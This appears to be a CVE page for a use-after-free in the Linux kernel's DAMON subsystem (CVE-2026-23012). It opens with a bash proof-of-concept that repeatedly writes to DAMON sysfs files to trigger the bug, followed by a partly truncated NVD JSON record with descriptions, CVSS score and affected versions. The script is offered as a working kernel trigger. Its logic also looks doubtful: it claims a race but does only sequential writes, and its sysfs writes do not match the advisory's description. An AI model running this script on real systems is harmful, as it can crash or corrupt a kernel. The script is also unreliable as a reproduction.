CVE-2026-23012

#!/bin/bash # CVE-2026-23012 PoC - DAMON sysfs interface trigger # Requires: root privileges and sysfs write access # Ensure DAMON is built into kernel if [ ! -d /sys/kernel/mm/damon ]; then echo "DAMON not available in this kernel" exit 1 fi # Create a DAMON context cd /sys/kernel/mm/damon/admin/contexts mkdir -p ctx_0 cd ctx_0 # Setup monitoring targets echo 1 > operations echo 1 > target_ids # Function to trigger the UAF condition trigger_uaf() { # Start context then immediately trigger error path echo on > state # Rapidly write to DAMON sysfs interface # This creates race condition in damon_call() for i in $(seq 1 100); do echo "triggering damon_call error path..." # Write operations that cause damon_call() to fail echo "invalid_op" > operations 2>/dev/null done } # The vulnerability occurs when: # 1. damon_call() is executed against inactive context # 2. Error returned but damon_call_control not removed from list # 3. Object deallocated # 4. Another damon_call() adds new object to same list with dangling pointer echo "Triggering CVE-2026-23012..." trigger_uaf echo "Check dmesg for use-after-free warnings"

{"cve": {"id": "CVE-2026-23012", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-25T15:15:56.073", "lastModified": "2026-03-25T19:49:02.980", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm/damon/core: remove call_control in inactive contexts\n\nIf damon_call() is executed against a DAMON context that is not running,\nthe function returns error while keeping the damon_call_control object\nlinked to the context's call_controls list. Let's suppose the object is\ndeallocated after the damon_call(), and yet another damon_call() is\nexecuted against the same context. The function tries to add the new\ndamon_call_control object to the call_controls list, which still has the\npointer to the previous damon_call_control object, which is deallocated. \nAs a result, use-after-free happens.\n\nThis can actually be triggered using the DAMON sysfs interface. It is not\neasily exploitable since it requires the sysfs write permission and making\na definitely weird file writes, though. Please refer to the report for\nmore details about the issue reproduction steps.\n\nFix the issue by making two changes. Firstly, move the final\nkdamond_call() for cancelling all existing damon_call() requests from\nterminating DAMON context to be done before the ctx->kdamond reset. This\nmakes any code that sees NULL ctx->kdamond can safely assume the context\nmay not access damon_call() requests anymore. Secondly, let damon_call()\nto cleanup the damon_call_control objects that were added to the\nalready-terminated DAMON context, before returning the error."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nmm/damon/core: eliminar call_control en contextos inactivos\n\nSi damon_call() se ejecuta contra un contexto DAMON que no está en ejecución, la función devuelve un error mientras mantiene el objeto damon_call_control vinculado a la lista call_controls del contexto. Supongamos que el objeto es desasignado después de damon_call(), y se ejecuta otro damon_call() contra el mismo contexto. La función intenta añadir el nuevo objeto damon_call_control a la lista call_controls, que todavía tiene el puntero al objeto damon_call_control anterior, que está desasignado. Como resultado, ocurre un uso después de liberación.\n\nEsto puede ser realmente activado usando la interfaz sysfs de DAMON. Sin embargo, no es fácilmente explotable ya que requiere el permiso de escritura de sysfs y realizar escrituras de archivo definitivamente extrañas. Por favor, consulte el informe para más detalles sobre los pasos de reproducción del problema.\n\nSolucione el problema realizando dos cambios. En primer lugar, mueva la kdamond_call() final para cancelar todas las solicitudes damon_call() existentes del contexto DAMON que termina, para que se realice antes del reinicio de ctx->kdamond. Esto hace que cualquier código que vea NULL en ctx->kdamond pueda asumir con seguridad que el contexto ya no puede acceder a las solicitudes damon_call(). En segundo lugar, permita que damon_call() limpie los objetos damon_call_control que fueron añadidos al contexto DAMON ya terminado, antes de devolver el error."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.17.1", "versionEndExcluding": "6.18.7", "matchCriteriaId": "FDCC46B4-613C-4010-9820-E91FA006C1F2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:-:*:*:*:*:*:*", "matchCriteriaId": "7CC8B11D-82DC-4958-8DC7-BF5CC829A5E9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*", "matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*", "matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*", "matchCriteriaId": "13580667-0A98-40CC-B29F-D12790B91BDB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc5:*:*:*: ... (truncated)